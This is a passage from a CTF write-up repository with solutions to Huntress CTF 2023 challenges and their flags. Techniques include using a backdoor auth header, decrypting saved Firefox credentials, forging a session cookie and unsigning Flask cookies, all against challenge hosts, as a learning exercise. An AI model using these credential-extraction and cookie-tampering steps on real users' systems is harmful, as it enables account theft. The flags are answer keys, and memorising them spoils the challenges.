YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==' http://chal.ctf.games:31029 15 | ``` 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b8e3d1ae-fc89-49ec-93a9-ea57108b8ddc) 18 | 19 | We can go one step further and carve out the flag directly: 20 | 21 | ```bash 22 | curl -s -H 'Authorization: Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==' http://chal.ctf.games:32337|awk '{print $2}'|base64 -d 23 | ``` 24 | 25 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/30be457d-441e-4698-9efb-98f357f40198) 26 | 27 | flag{60bb3bfaf703e0fa36730ab70e115bd7} 28 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Dumpster_Fire.md: -------------------------------------------------------------------------------- 1 | # Dumpster Fire 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2481bf41-98db-4c7b-8456-cc394ed1bc06) 5 | 6 | ### Solution 7 | We seem to have a dump of a Linux filesystem. As always, I start by looking in the folders of the user: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/80f9e908-807a-43ea-80d2-ebc72f2974be) 9 | 10 | What draws my attention immediately is the `.mozilla` folder. This guy may have accessed some websites containing flags. We can use the following tool to decrypt a Firefox profile and all of its contents, including stored credentials. 11 | 12 | https://github.com/unode/firefox_decrypt 13 | 14 | Indeed, when we run the tool and give it the specific profile we want decrypted, we get the flag as part of a password used at some point. 15 | 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a1ad4009-ec68-451f-9d91-f69e578d152b) 17 | 18 | flag{35446041dc161cf5c9c325a3d28af3e3} 19 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Opposable_Thumbs.md: -------------------------------------------------------------------------------- 1 | # Opposable Thumbs 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e3756d2b-5c4f-4da7-8099-e22eed4c170a) 5 | 6 | ### Solution 7 | In this case, running a file command doesn't really help as we only get that it contains data: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/17f6b37a-80e3-49f6-b8aa-f460ca6c7e08) 9 | 10 | In such cases, I revert to manually looking at the file header using a hexeditor. In some cases it may simply be wrong or missing. In this case however, we see an unfamiliar header called `CMMM`: 11 | 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b8bc15e0-ba8d-45aa-89ac-b2412f5f95ed) 13 | 14 | A quick google search indicates that this is a Windows cache file: 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ded9416e-b852-4489-beef-baf646f80ed6) 16 | 17 | I'm sure that there are several ways of reading this file, however, the way I did it is by using this tool: 18 | https://github.com/dbrant/ThumbCacheViewer 19 | 20 | This tool sees the other cache files in my VM as well but the one we are interested in is the one with 256 in the name and we get the flag: 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d27defba-2730-492a-8002-90a3a7057674) 22 | 23 | flag{human_after_all} 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Traffic.md: -------------------------------------------------------------------------------- 1 | # Traffic 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7e0c5469-f06c-4319-a60a-2fc6f2d8d6f6) 5 | 6 | ### Solution 7 | After we unzip all of the files, we get down to some logs: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4d8da37a-1a29-470d-87f7-dac9d30dc01f) 9 | 10 | At first I used `cat` to read each category of logs: capture*, conn*, ssl*. After that, I read the challenge description more carefully and grepped for the word `sketchy`. 11 | 12 | ```bash 13 | strings *|grep sketchy 14 | ``` 15 | We can indeed find a sketchy website being accessed more than once: 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d5786289-2178-4b9d-b577-8df1460d49ec) 17 | 18 | Accessing the website ourselves, we can find the flag: 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ca625ed4-46cf-4607-bbec-31142478ce46) 20 | 21 | We can also run this command directly: 22 | ```bash 23 | curl -s -L sketchysite.github.io|grep flag 24 | ``` 25 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1bf7b950-ec0c-46a3-b187-b55ca46d31d5) 26 | 27 | 28 | flag{8626fe7dcd8d412a80d0b3f0e36afd4a} 29 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Tragedy.md: -------------------------------------------------------------------------------- 1 | # Tragedy 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c35b7771-60f9-41aa-a97a-e6df885d5a71) 5 | 6 | ### Solution 7 | When this was initially posted, the description looked different. A mistake was made and they accidentally uploaded the file with the solution and the flag: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8901cd94-349a-40cf-b3fc-2c4b8f640a84) 9 | 10 | These were free points: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9f8f208c-a566-4e9e-aa48-f465f9952f29) 12 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Wimble.md: -------------------------------------------------------------------------------- 1 | # Wimble 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/468c6246-07a9-49d3-8f2a-e5ea567476b5) 5 | 6 | ### Solution 7 | This was a duplicate challenge from Nahamcon CTF 2023. The solution can be found [here](https://github.com/LazyTitan33/CTF-Writeups/blob/main/Nahamcon-2023/Forensics/Fetch.md) 8 | 9 | flag{97f33c9783c21df85d79d613b0b258bd} 10 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Malware/Opendir.md: -------------------------------------------------------------------------------- 1 | # Opendir 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b2c71c37-2984-4343-bf92-a538410f372d) 5 | 6 | ### Solution 7 | Accessing the generated challenge link, we can find a Directory Listing: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/20fd2bf9-0e43-4f2a-b6ec-96541400c68d) 9 | 10 | I realized it would take too long to manually go through it all so I used this `wget` command to recursively download all the content into a folder: 11 | 12 | ```bash 13 | wget -r --user opendir --password opendir http://chal.ctf.games:32688/ 14 | ``` 15 | I then used `grep` to recursively search for the flag and show the line number and file in which the flag is located (force of habit): 16 | 17 | ```bash 18 | grep -rna 'flag{' 19 | ``` 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6719de08-913d-4263-80a7-c8842f2335f5) 21 | 22 | flag{9eb4ebf423b4e5b2a88aa92b0578cbd9} 23 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Malware/Rat.md: -------------------------------------------------------------------------------- 1 | # Rat 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5d1f7e2f-ce4a-42af-938d-2dda61c4da27) 5 | 6 | ### Solution 7 | After a bit of static analysis and struggling to do dynamic analysis with Procmon, Wireshark, TCPView etc... I uploaded the binary file into VirusTotal: 8 | https://www.virustotal.com/gui/file/7a83115ab46ba6a3c237d78f32bd3386ff4d4d7cd7b06ad731fe8071b2246278/behavior 9 | 10 | Scrolling through the details, I noticed the flag: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/18bb692a-a2cb-4b6f-9881-2a20d6a83e33) 12 | 13 | flag{8b988b859588f2725f0c859104919019} 14 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Malware/Snake_Eater.md: -------------------------------------------------------------------------------- 1 | # Snake Eater 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/450b20c6-075c-4c20-a629-ad71b9a0e3c7) 5 | 6 | ### Solution 7 | Running the file command on the executable we are given doesn't help much: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f3face6a-a846-4348-ab0e-86fbfe788330) 9 | 10 | However, running `strings` on it, we get some indications that this is actually a Python script that has been obfuscated and compiled to a self contained binary. 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/463b5c4b-e370-4dfb-8634-1e23577fe6f0) 12 | 13 | If we put this in a Windows VM, we can see the icon mentioned in the challenge description which confirms it's a Python executable: 14 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1cbfd62f-f653-47e5-a6a7-0928d724e6ca) 15 | 16 | I have to admit that I wasted a lot of time on this challenge trying to do static analysis. I struggled to decompile it to a clean and readable python code so after a couple of hours, I decided to do dynamic analysis instead. 17 | 18 | In a segregated Windows VM, I started `Procmon` and configured it to show only processes started by my binary and find anything in the path where `flag` is mentioned: 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/03dc3f98-1aeb-4285-9e97-8f01d5d61313) 20 | 21 | Once I executed the binary, I immediately got the flag: 22 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/962efcbe-a81b-4f8f-bf42-f7a4e567777c) 23 | 24 | flag{d1343a2fc5d8427801dd1fd417f12628} 25 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Malware/Zerion.md: -------------------------------------------------------------------------------- 1 | # Zerion 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45c2cd89-0363-4547-9266-c3922251a31b) 5 | 6 | ### Solution 7 | Running a file command we see that we got a PHP script: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3aa974e5-9e00-43a4-b588-c3156821d0bd) 9 | 10 | The script contains what looks like Base64 data but reversed. This is easy to tell because of the fact that it starts with a double equal sign: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1a253e71-d098-40c2-acea-3a553dcb94a5) 12 | 13 | We copy and paste the blob in Cyberchef, reverse and Base64 decode it and we can see the flag inside: 14 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/93c99bf9-c67c-4581-90bd-ad8ef2732e80) 15 | 16 | flag{af10370d485952897d5183aa09e19883} 17 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Misc/Discord_Snowflake_Scramble.md: -------------------------------------------------------------------------------- 1 | # Discord Snowflake Scramble 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3b60266a-9def-4f1e-ae18-36b7939da712) 5 | 6 | ### Solution 7 | This one required some googling but because of SEO, a lot of results were nothing I was interested in so I switch search engines and used duckduckgo: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ee9e5f69-d826-44d7-a0fc-2ca05e9c85d3) 9 | 10 | The first 3 results show tools that parse the IDs in the link we were provided differently. Turns out these IDs are called Snowflakes and they can represent either a Message ID, or a Server ID, a channel ID etc. The tool that ultimately helped me further was [discordtools](https://discordtools.io). I was reticent at first because for it to give you detailed information, other than the timestamp of the snowflake, they require you to login with your Discord account. However, the good news is that it's an Open Source application with their code on Github so that was reassuring for me. 11 | 12 | I inputted the first Snowflake from the link and sure enough, getting the detailed Discord info, we can see an Invite link: 13 | 14 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/93bf427c-8a5e-426c-ac89-fe7c35e1ff56) 15 | 16 | Accessing that link gets us on this hidden server and we have the flag in the channel with the same name: 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/11fece46-a83e-4722-8098-8580d07a73a3) 18 | 19 | flag{bb1dcf163212c54317daa7d1d5d0ce35} 20 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Misc/I_Wont_Let_You_Down.md: -------------------------------------------------------------------------------- 1 | # I Wont Let You Down 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/30fa05b7-e4af-4981-bd54-fdf1e64cc978) 5 | 6 | ### Solution 7 | This was a pretty straightforward challenge as it told us what to do every step of the way. First we go take a look at the IP: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/086cd285-3a77-434e-8649-9f9d12cc6d6c) 9 | 10 | The website tells us that it is okay to use nmap so that's what we do: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/34a35792-e1bc-47f9-b30b-32bac136b353) 12 | 13 | We see another HTTP port open, `8888`, so we access that and get the flag from the bottom of the page: 14 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c94b1fd6-c15e-414c-97e5-415f22774844) 15 | 16 | flag{93671c2c38ee872508770361ace37b02} 17 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Misc/Who_is_Real?.md: -------------------------------------------------------------------------------- 1 | # Who is Real? 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8e44f69e-1228-4208-ad28-a7008dc78d41) 5 | 6 | ### Solution 7 | When we access the website we see two faces and we have to decide which one is real: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/abbba3e8-a944-487d-b841-497294da585c) 9 | 10 | If we intercept the request with Burpsuite though, we can see it's setting up a Flask cookie. 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4b5da9b5-1d43-4c3b-b33d-5b061402e0ba) 12 | 13 | Using `flask-unsign` which you can install with `pip install flask-unsign` we can see that it reveals the correct answer: 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3fad70cc-6f41-4e3b-a2c1-9ee1a934263f) 16 | 17 | We just need to hover our mouse over the images and see which one has the specified GUID and then click on it. We can repeat this until we get the streak that we need: 18 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45adeaf3-df91-438b-9622-76cacc3fc3a3) 19 | 20 | Once we hit the streak of 5/5 we get our flag: 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45841514-5c2f-44e5-a275-75e9109e8634) 22 | 23 | This was a nice and easy challenge. What would've made it better would've been a longer streak to encourage scripting these steps. 24 | 25 | flag{10c0e4ed5fcc3259a1b0229264961590} 26 | 27 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/OSINT/Operation_Not_Found.md: -------------------------------------------------------------------------------- 1 | # Operation Not Found 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0602316f-bcf3-4d63-9d73-655d0cb9a1df) 5 | 6 | ### Solution 7 | Accessing the provided link, we can see a building and the name of a company: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7fc69a62-5409-44c0-a749-b89e945da88a) 9 | 10 | After wasting a lot of time looking around for different office buildings where this company would be, I decided to take a cropped screenshot of the building all zoomed out. I uploaded it into the russian site https://yandex.com: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/df70504c-b2cb-4eca-9d23-bae767e319b0) 12 | 13 | 14 | The very first result shows a very similar building and indicates this is the Georgia Tech Library: 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/948d27e6-277a-48ef-a759-5872a7e84c25) 16 | 17 | But that's quite a big place. Taking a closer look at the picture that Yandex found, we can see the building sign is still on it. In our picture it was taken down. It says it's the `Crosland Tower` which helps narrow it down even further. 18 | 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/db5e45ba-6291-4da3-bed4-72441e79a086) 20 | 21 | We find that in the challenge map and get our flag: 22 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8b10803a-dacb-40e0-8305-1d95ed15127f) 23 | 24 | 25 | flag{c46b7183c9810ec4ddb31b2fdc6a914c} 26 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/OSINT/Where_am_I?.md: -------------------------------------------------------------------------------- 1 | # Where am I? 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c274f7bf-a8c1-495e-a974-8434e4fc4369) 5 | 6 | ### Solution 7 | This one seemed closer to Stego than OSINT but indeed, for OSINT situations where you have some pictures to analyze, you would look at the metadata first. There was a lot of metadata in this picture, including GPS coordinates which I wasted some time on. 8 | 9 | But then I scrolled up and saw the `Image Description`: 10 | 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45b0f7d2-c18b-422c-8d31-b4237e47fe09) 12 | 13 | Now we can get the flag: 14 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d8ef451d-47e1-420a-b4f3-85b5efefc369) 15 | 16 | A bash oneliner like this would do it: 17 | 18 | ```bash 19 | exiftool -ImageDescription PXL_*.jpg|awk '{print $4}'|base64 -d 20 | ``` 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45674d5e-8397-4cee-8ed6-5c19b3eebedb) 22 | 23 | flag{b11a3f0ef4bc170ba9409c077355bba2) 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/README.md: -------------------------------------------------------------------------------- 1 | This was a month log CTF in which they released 2 challenges per day. In the last week it was only 1 per day. It was fun and kept me engaged throughout the month with nice challenges that helped me learn a lot and add some tools in my toolkit. Sadly I'm missing BlackCat 2 and Crab Rave. 2 | 3 | I finished 100th out of 4212 teams playing solo. 4 | 5 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/00288ee7-b8a5-4c09-8421-19cfc2fb7f58) 6 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Stego/Land_Before_Time.md: -------------------------------------------------------------------------------- 1 | # Land Before Time 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/21e6fbd9-94f1-4810-ace4-c9d10bef0551) 5 | 6 | ### Solution 7 | The challenge description indicates the tool we should be using: `iSteg`. A quick google search helps us find it: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/38766877-410b-4c69-85a2-5f540deb1f19) 10 | 11 | We can find a pre-compiled binary here: 12 | https://github.com/rafiibrahim8/iSteg/releases 13 | 14 | Being a java application, we can open it using the syntax below: 15 | 16 | ```bash 17 | java -jar iSteg-v2.1_GUI.jar 18 | ``` 19 | 20 | Once we open our provided png file, we get our flag: 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/36521aa0-786c-4658-9e7b-6d333b832282) 22 | 23 | flag{da1e2bf9951c9eb1c33b1d2008064fee} 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Baking.md: -------------------------------------------------------------------------------- 1 | # Baking 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5d1039ad-af74-4ccb-9e47-859df2b6fdf8) 5 | 6 | ### Solution 7 | Accessing the web page we see we can bake some cookies. The Magic Cookies however seem to take 7200 minutes which is forever... not someting we have time for: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1c7ec7a6-4b24-4e5a-b213-40ad5c486f5a) 10 | 11 | We also see that a cookie is set when baking the cookie: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8a50dc79-5d4c-4cac-98be-a57543e87a2f) 13 | 14 | ```bash 15 | echo 'eyJyZWNpcGUiOiAiTWFnaWMgQ29va2llcyIsICJ0aW1lIjogIjEwLzE0LzIwMjMsIDE1OjUzOjUwIn0='|base64 -d 16 | ``` 17 | Decoding this cookie, we can see it's a JSON object which includes the time for when the cookie would be done. 18 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c212758e-5049-475f-bff9-3151b590ad46) 19 | 20 | ```bash 21 | echo -n '{"recipe": "Magic Cookies", "time": "10/14/2022, 15:53:50"}'|base64 -w0 22 | ``` 23 | 24 | We changed the year to put it in the past: 25 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fe203bbd-b62b-4020-9285-c5b964aa8b75) 26 | 27 | Now that we have a new cookie, we replace it in the browser and refresh to get the flag: 28 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b2ae3a8b-0910-483d-b5a2-3aca77b211a6) 29 | 30 | flag{c36fb6ebdbc2c44e6198bf4154d94ed4} 31 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/BaseFFFF+1.md: -------------------------------------------------------------------------------- 1 | # BaseFFFF+1 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/34d9db40-87f8-412a-add8-8f0c7d7cf533) 5 | 6 | ### Solution 7 | Reading the file, we get some symbols that are very unfamiliar: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d472eebc-5ca6-44af-8652-3448a78eff1e) 9 | 10 | This is the content: 11 | ```bash 12 | 鹎驣𔔠𓁯噫谠啥鹭鵧啴陨驶𒄠陬驹啤鹷鵴𓈠𒁯ꔠ𐙡啹院驳啳驨驲挮售𖠰筆筆鸠啳樶栵愵欠樵樳昫鸠啳樶栵嘶谠ꍥ啬𐙡𔕹𖥡唬驨驲鸠啳𒁹𓁵鬠陬潧㸍㸍ꍦ鱡汻欱靡驣洸鬰渰汢饣汣根騸饤杦样椶𠌸 13 | ``` 14 | A quick google helps us determine that `ffff` in decimal is actually just 65535: 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c3b0ff12-c493-40d7-b1d5-b0ffa55749ef) 16 | 17 | Since 65535 + 1 = 65536, let's search and see if `base65536` is actually a thing: 18 | 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7911c009-3c6b-4a29-be03-ce480d801095) 20 | 21 | We seem to be on the right track as we have results indicating that this does in fact exist. We can use this online decoder and get our flag: 22 | https://www.better-converter.com/Encoders-Decoders/Base65536-Decode 23 | 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/01d00640-fa35-42db-accd-58c7a50b794c) 25 | 26 | flag{716abce880f09b7cdc7938eddf273648} 27 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Book_By_Its_Cover.md: -------------------------------------------------------------------------------- 1 | # Book By Its Cover 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/33e93054-d1c3-4054-b9d8-ac66daf17e49) 5 | 6 | ### Solution 7 | This is a challenge that indicates the importance of common commands such as `file`. This doesn't apply just in CTFs. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e015e05c-51ec-4882-a452-52b876945f4f) 10 | 11 | Because we now know that the "archive" is in fact a picture, we rename it. 12 | 13 | ```bash 14 | mv book.rar book.png 15 | ``` 16 | Opening the picture, we get the flag: 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c3f5ec92-3b11-47f1-ab43-657e91e09bf3) 18 | 19 | To make it easier on us, we can use `tesseract`, a great OCR tool, to get the text out of the picture since we don't want to make any mistakes when manually transcribing it: 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c245d93b-1a51-4563-95ff-ca84a1a2e7d8) 21 | 22 | This creates a flag.txt file containg our flag. 23 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b38e63ed-fe67-4756-93fc-ca65b095de58) 24 | 25 | flag{f8d32a346745a6c4bf4e9504ba5308f0} 26 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/CaesarMirror.md: -------------------------------------------------------------------------------- 1 | # CaesarMirror 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/69d8126e-d28d-45eb-8651-c34a1fce0dbc) 5 | 6 | ### Solution 7 | Reading the provided file, we see two columns of text: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c1608fea-391c-4139-a6f9-5d33e2932557) 9 | 10 | The name of the challenge as well as the way the text looks like, make me thing of `rot13` so I apply it to the file and get the left column decoded and we get a first part of the flag: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9d4312bb-9a3e-46f4-a35a-94c9a17f327a) 12 | 13 | ```bash 14 | flag{julius_ 15 | ``` 16 | We use a text editor to carve out only the second column, after we applied the `rot13` and save it separately. If you look closely enough, the last word is Caesar spelled backwards so let's apply `rev` on this column: 17 | 18 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/997bd908-1475-47c8-9cd2-a51f170104e6) 19 | 20 | It was succesful and we have our 2nd and 3rd part of the flag. Putting it all together we get: 21 | 22 | flag{julius_in_a_reflection} 23 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Chicken_Wings.md: -------------------------------------------------------------------------------- 1 | # Chicken Wings 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c474f897-9a86-4095-874d-5216a3e34ee9) 5 | 6 | ### Solution 7 | Reading the file shows us what at first may look like emoji. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6b74b0b6-3312-4528-8c9d-dea53f2f9244) 10 | 11 | We can use this very handy website, especially for CTFs, to identify what we are looking at: 12 | https://www.dcode.fr/cipher-identifier 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1b499469-252a-4fad-bee3-f9c261b06685) 14 | 15 | It seems it's not emoji but actually just the Wingdings font, which makes sense given the name of the challenge. 16 | https://www.dcode.fr/wingdings-font 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/122f10b9-4e29-4e76-b9b9-9feca778ed1b) 18 | 19 | flag{e0791ce68f718188c0378b1c0a3bdc9e} 20 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Comprezz.md: -------------------------------------------------------------------------------- 1 | # Comprezz 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4762a806-d48f-4315-8b18-4fed0ac0965b) 5 | 6 | ### Solution 7 | Running the file command on this, we get a strange message: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/79e0da56-e053-4142-816a-95e67261b563) 9 | 10 | A quick Google search seems to indicate this is a `.z` file: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5990af18-e103-4a4e-89d3-cc58716b4001) 12 | 13 | On this link, we can find this information: 14 | https://stackoverflow.com/questions/12168081/how-can-i-uncompress-z-file-under-ubuntu 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/20e1be55-4610-4258-80ca-d699fe2353bb) 16 | 17 | So let's go ahead and rename the file and try to uncompress it: 18 | 19 | ```bash 20 | mv comprezz comprezz.z 21 | uncompress comprezz.z 22 | ``` 23 | It works, and we get a file that we can read: 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5b272514-713d-4fc8-b331-02844b6eaab6) 25 | 26 | flag{196a71490b7b55c42bf443274f9ff42b} 27 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/F12.md: -------------------------------------------------------------------------------- 1 | # F12 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4df876e9-24b8-4a11-a78b-0175b0376858) 5 | 6 | ### Solution 7 | Accessing the provided link, we can see a page with just a button on it: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9ad5eee9-4d00-4233-a749-843c5d994deb) 9 | 10 | Intercepting with `Burpsuite` we can see the page that's opened once the button is pressed, no need to race against time and try F12 on the little window that opens and closes very quickly. 11 | 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2ed4a2e1-4549-4c23-a97d-05dcc81edeb8) 13 | 14 | flag{03e8ba07d1584c17e69ac95c341a2569} 15 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Layered_Security.md: -------------------------------------------------------------------------------- 1 | # Layered Security 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/493eb329-1441-4611-9594-77454df58982) 5 | 6 | ### Solution 7 | As usual, we start by running the file command on the provided file and we see it's a GIMP file: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e53c67dd-9a0f-4eef-9acc-aaa32943f77e) 10 | 11 | I searched online for ways to open this without installing GIMP: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c75b3178-d615-49d1-9ae2-f1f2400ef730) 13 | 14 | The first result in DuckDuckGo was very helpful. I don't recommend searching for these kinds of tools using Google as you get a lot of ads and shady websites. 15 | https://fixthephoto.com/online-gimp-editor.html 16 | 17 | Uploading the file in this tool, we can see a bunch of pictures in various layers, thus the name of the challenge. Even in the thumbnail, you can see that Layer #3 isn't just a picture: 18 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e460fa42-3be3-4363-ac1f-d3dc382ca362) 19 | 20 | In fact, if we click on the small eye icon for the top pictures to hide them, we get to this layer and get the flag: 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ff2db2da-33ca-428e-a41a-edfd94e23cb2) 22 | 23 | flag{9a64bc4a390cb0ce31452820ee562c3f} 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Notepad.md: -------------------------------------------------------------------------------- 1 | # Notepad 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/336f3497-b32f-4e5f-983a-722dbb83410e) 5 | 6 | ### Solution 7 | All we have to do for this warmup chalenge is read the provided file: 8 | 